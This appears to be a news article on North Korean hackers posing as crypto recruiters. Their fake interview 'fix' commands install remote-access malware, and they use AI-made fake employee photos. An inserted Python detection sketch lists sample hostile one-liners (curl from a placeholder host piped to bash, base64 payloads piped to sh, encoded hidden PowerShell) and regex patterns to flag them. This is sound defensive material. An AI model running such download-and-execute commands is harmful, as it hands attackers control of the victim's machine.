North Korean Hackers Pose as Crypto Employers to Spread Malware—Because Even Cybercrime Has a Side Hustle Now
Lazarus Group strikes again—this time using fake blockchain job offers as bait. Their latest scheme? Impersonating legitimate crypto startups to deliver malware via ‘recruitment opportunities.’ Because nothing says ‘trust us with your digital future’ like a North Korean IP address.
How it works: Hackers set up polished LinkedIn profiles and company websites for sham crypto firms. Targets receive too-good-to-be-true job offers—only to download malware-laden ‘technical assessments.’ Classic case of ‘if the APY sounds unreal, the employer probably is too.’
The kicker? These operations specifically target DeFi developers and crypto-savvy professionals. Because why mine bitcoin when you can just steal it from people who already did the work?
Security experts warn this marks an escalation in DPRK’s crypto-focused cyberwarfare. Meanwhile, VC-backed web3 startups continue paying 7-figure salaries for ’community growth hackers’—proving the crypto job market was already surreal before nation-state actors joined the talent hunt.
Malware disguised as interview tools
The fake interview process typically involves a request for an introductory video. When applicants try to upload the video, they encounter an error. They’re then given a quick-fix solution of a copy-and-paste command that secretly delivers malware.
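The paste-and-run lure described above leaves a trace that endpoint telemetry can catch: a one-liner run from the user's interactive shell that fetches or decodes something and feeds it straight into an interpreter. The following is an added detection sketch, not code from Silent Push or the article; the sample events are constructed, and the command shapes it matches are an assumption about what such a "fix" commonly looks like, since the article does not quote the actual command.

```python
import re

# Constructed process-creation events in a "ts|parent|cmdline" format,
# not real telemetry from this campaign. The last line downloads a file
# without executing it and must NOT be flagged.
SAMPLE_EVENTS = """\
1700000001|zsh|ls -la ~/projects
1700000040|zsh|curl -fsSL https://example.invalid/fix.sh | bash
1700000041|bash|echo aGVsbG8= | base64 -d | sh
1700000055|cmd.exe|powershell.exe -nop -w hidden -enc AAAA
1700000060|zsh|git pull origin main
1700000070|zsh|curl -fsSL https://example.invalid/fix.sh -o fix.sh
"""

# Pasted lures run from the victim's own shell, not from a build tool.
INTERACTIVE_SHELLS = {"sh", "bash", "zsh", "cmd.exe", "powershell.exe"}

# (regex, reason) pairs; assumed shapes of download-and-execute one-liners.
SUSPICIOUS_PATTERNS = [
    (r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da|)sh\b",
     "remote script piped into a shell"),
    (r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z|da|)sh\b",
     "base64-decoded payload piped into a shell"),
    (r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b",
     "encoded PowerShell command"),
]


def parse_events(text):
    """Split the pipe-delimited sample into dicts with ts, parent, cmdline."""
    events = []
    for line in text.strip().splitlines():
        ts, parent, cmdline = line.split("|", 2)
        events.append({"ts": int(ts), "parent": parent, "cmdline": cmdline})
    return events


def classify(cmdline):
    """Return the reasons a command line matches a paste-and-run shape, or []."""
    return [why for pat, why in SUSPICIOUS_PATTERNS
            if re.search(pat, cmdline, re.IGNORECASE)]


def detect(text):
    """Return (ts, reason) for each event from an interactive shell that matches."""
    hits = []
    for ev in parse_events(text):
        if ev["parent"] in INTERACTIVE_SHELLS:
            hits.extend((ev["ts"], why) for why in classify(ev["cmdline"]))
    return hits


if __name__ == "__main__":
    for ts, why in detect(SAMPLE_EVENTS):
        print(ts, why)
```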
Edwards said:
“During the job application process an error message is displayed as someone tries to record an introduction video and the ‘solution’ is an easy ‘click fix’ copy and paste trick, which leads to malware if the unsuspecting developer completes the process.”
Silent Push identified three distinct malware strains used in this campaign: BeaverTail, InvisibleFerret, and OtterCookie. These tools give hackers remote access to victims’ devices and allow them to extract sensitive information.
The attackers use services like Astrill VPN and residential proxies to cover their tracks, making their infrastructure difficult to trace.
AI-generated identities
Beyond malware, the North Korean attackers rely heavily on fake AI personas to perform their nefarious activities.
Silent Push found that the threat actors use AI tools like Remaker AI to generate fake employee photos. Sometimes, they even alter real images to create deceptive profiles that look nearly authentic.
Edwards said:
“There are numerous fake employees and stolen images from real people being used across this network…In one of the [cases], the threat actors took a real photo from a real person, and then appeared to have run it through an ‘AI image modifier tool’ to create a subtly different version of that same image.”
This development marks a dangerous evolution in cybercrime targeting the crypto space. The combination of malware, social engineering, and AI-generated identities signals a growing threat.
Edwards concluded:
“This investigation is a perfect example of what happens when threat actors continue to uplevel their efforts one campaign after the next, without facing justice.”